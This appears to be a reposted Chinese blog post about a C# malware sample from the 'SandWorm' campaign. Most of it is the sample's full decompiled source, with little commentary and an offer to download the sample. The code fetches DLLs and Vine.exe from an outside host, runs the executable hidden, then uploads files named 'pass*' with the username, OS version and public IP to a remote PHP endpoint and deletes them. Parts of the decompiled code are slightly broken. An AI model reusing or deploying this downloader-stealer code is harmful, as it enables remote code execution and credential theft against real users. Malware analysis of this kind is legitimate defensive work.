Virus_C#_SampleAnalysis
来源:互联网 发布:mysql进程意外终止 编辑:程序博客网 时间:2024/06/03 22:21
0x1 背景
这几天在做一些小结,除了二进制,也对其他的做点记录,本篇讲C#样本的简单分析.
前几天启明有篇文章讲到了SandWorm样本,漏洞部分也没分析,就跟着文章的描述简单的过了一遍,下载到文章中提到的Down样本.用PEId查壳是 Microsoft Visual C# / Basic .NET,快速的做了分析.
0x2 主角登场
本来该是样本的,但个人感觉dnSpy更牛逼闪闪,话不多说,上图:
注:项目右键:1可以Debug,2可以保存为本地项目(见附件)ILSpy也可以吧,喜欢的还是他俩.
2.1样本分析
using System;using System.Collections.Generic;using System.Diagnostics;using System.IO;using System.Net.Http;using System.Threading.Tasks;namespace DownloadAndExecute{ internal class Program { private static readonly HttpClient client = new HttpClient(); private static bool success = false; private static int exitCode = 1; private static void Main(string[] args) { Program.DownloadFiles().Wait(); if (Program.success) { using (Process process = Process.Start(new ProcessStartInfo { FileName = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe"), WindowStyle = ProcessWindowStyle.Hidden, WorkingDirectory = Path.GetDirectoryName(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe")), CreateNoWindow = true })) { process.WaitForExit(); Program.exitCode = process.ExitCode; } } if (Program.exitCode == 0) { Program.UploadFiles().Wait(); } } private static async Task UploadFiles() { try { int num; FileInfo[] array; int num2; if (num > 2) { FileInfo[] files = new DirectoryInfo(Path.Combine(new string[] { Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) })).GetFiles(); array = files; num2 = 0; goto IL_28A; } IL_70: FileInfo fileInfo; try { string value = File.ReadAllText(fileInfo.FullName); string value2 = await Program.GetExternalIPAddress(); FormUrlEncodedContent content = new FormUrlEncodedContent(new Dictionary<string, string> { { "data", "data" }, { "username", Environment.UserName }, { "os_version", Environment.OSVersion.VersionString }, { "file_path", fileInfo.Name }, { "public_ip", value2 }, { "file_content", value } }); if (await(await Program.client.PostAsync("http://www.ictcoe.org.et/plugins/system/legacy/core.php", content)).Content.ReadAsStringAsync() == fileInfo.Name) { fileInfo.Delete(); } value = null; } catch (Exception) { } IL_275: fileInfo = null; num2++; IL_28A: if (num2 >= array.Length) { array = null; } else { fileInfo = array[num2]; if (fileInfo.Name.StartsWith("pass")) { goto IL_70; } goto IL_275; } } catch (Exception) { } } private static async Task<string> GetExternalIPAddress() { string result; try { result = (await(await Program.client.GetAsync("http://checkip.dyndns.org")).Content.ReadAsStringAsync()).Split(new char[] { ':' })[1].Substring(1).Split(new char[] { '<' })[0]; } catch (Exception) { result = ""; } return result; } private static async Task DownloadFiles() { try { string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Newtonsoft.Json.dll"); FileInfo fileInfo = new FileInfo(text); if (!fileInfo.Exists) { byte[] buffer = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Newtonsoft.Json.dll")).Content.ReadAsByteArrayAsync(); BinaryWriter expr_144 = new BinaryWriter(new FileStream(text, FileMode.Create)); expr_144.Write(buffer); expr_144.Close(); } fileInfo = new FileInfo(text); Console.WriteLine("Newton soft json dll length is: " + fileInfo.Length); string text2 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "System.Data.SQLite.DLL"); FileInfo fileInfo2 = new FileInfo(text2); if (!fileInfo2.Exists) { byte[] var_7_27E = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/System.Data.SQLite.DLL")).Content.ReadAsByteArrayAsync(); BinaryWriter expr_291 = new BinaryWriter(new FileStream(text2, FileMode.Create)); expr_291.Write(var_7_27E); expr_291.Close(); } fileInfo2 = new FileInfo(text2); Console.WriteLine("Sqlite dll length is: " + fileInfo2.Length); string text3 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe"); FileInfo fileInfo3 = new FileInfo(text3); if (!fileInfo3.Exists) { byte[] var_8_3CB = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Vine.exe")).Content.ReadAsByteArrayAsync(); BinaryWriter expr_3DE = new BinaryWriter(new FileStream(text3, FileMode.Create)); expr_3DE.Write(var_8_3CB); expr_3DE.Close(); } fileInfo3 = new FileInfo(text3); Console.WriteLine("Vine exe length is: " + fileInfo3.Length); Program.success = true; text = null; text2 = null; text3 = null; } catch (Exception) { } } }}
0x3 Sample
Sample-请确认样本只用于测试才下载,其他的我可不负-密码国际惯例
0x4 参考文章
“沙虫”二代来袭,office全线沦陷!